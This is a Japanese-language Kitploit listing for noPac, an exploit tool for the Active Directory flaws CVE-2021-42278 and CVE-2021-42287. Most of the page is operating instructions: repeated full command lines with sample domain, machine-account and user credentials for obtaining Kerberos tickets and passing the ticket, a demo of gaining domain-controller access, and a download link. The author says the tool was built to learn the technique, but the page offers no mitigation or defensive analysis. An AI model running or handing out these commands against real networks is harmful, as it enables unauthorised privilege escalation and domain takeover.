Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
noPac — CVE-2021-42287/CVE-2021-42278 エクスプロイター | Kitploit
ツール/GitHubGitHub/trya9ain/nopac
認証と認可特権昇格脆弱性分析エクスプロイトペネトレーションテスト
GitHubtrya9ain/nopac

noPac

CVE-2021-42287/CVE-2021-42278 エクスプロイター

リポジトリを見る
141153年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

noPac

このプロジェクトは、noPac の原理学習のために生まれました。cube0x0 のプロジェクトをベースにいくつかの変更を加えています。ソースコードには個人的な理解のコメントを追加しました。

  • Scan 機能を削除しました。個人的には Scan 機能はあまり役に立たないと感じました。
  • MachineAccountQuota 値の判定を追加しました。0 の場合はプログラムを終了します。
  • コンピュータアカウント追加時の判定処理を最適化しました。
  • TGT の出力を追加しました。

脆弱性の分析記事は私のブログ記事をご覧ください:noPac 分析

利用条件

noPac は CVE-2021-42278 (sAMAccountName spoofing) と CVE-2021-42287 (deceiving the KDC) の2つの脆弱性を組み合わせたものです。これらの脆弱性の利用条件を同時に満たした場合のみ、正常に利用できます。

使用方法

Examples: Get TGT and ST

  noPac.exe /domain DomainName /dc DomainController /mAccount MachineAccount /mPassword MachineAccountPassword /user DomainUser /pass DomainUserPassword

  noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei

  noPac.exe /domain DomainName /dc DomainController /mAccount MachineAccount /mPassword MachineAccountPassword /user DomainUser /pass DomainUserPassword /service altservice

  noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs

Examples: PTT

  noPac.exe /domain DomainName /dc DomainController /mAccount MachineAccount /mPassword MachineAccountPassword /user DomainUser /pass DomainUserPassword /service altservice /ptt

  noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt

  noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt

最もよく使われる方法は PTT です:

noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt

Demo

noPac 利用前は DC にアクセスする権限がありません。

noPac を利用します。

noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt

PTT 後、現在のウィンドウで再度 DC にアクセスすると成功します。

利用環境

プログラムは .NET 4.0+ 環境のマシンでのみ実行可能です。Windows Server 2012 はデフォルトで .NET 4.0 が含まれ、Windows Server 2008 はデフォルトで .NET 3.5 が含まれます。

マシン上の .NET バージョンを確認するには:

dir c:\Windows\Microsoft.NET\Framework64

ツールをダウンロード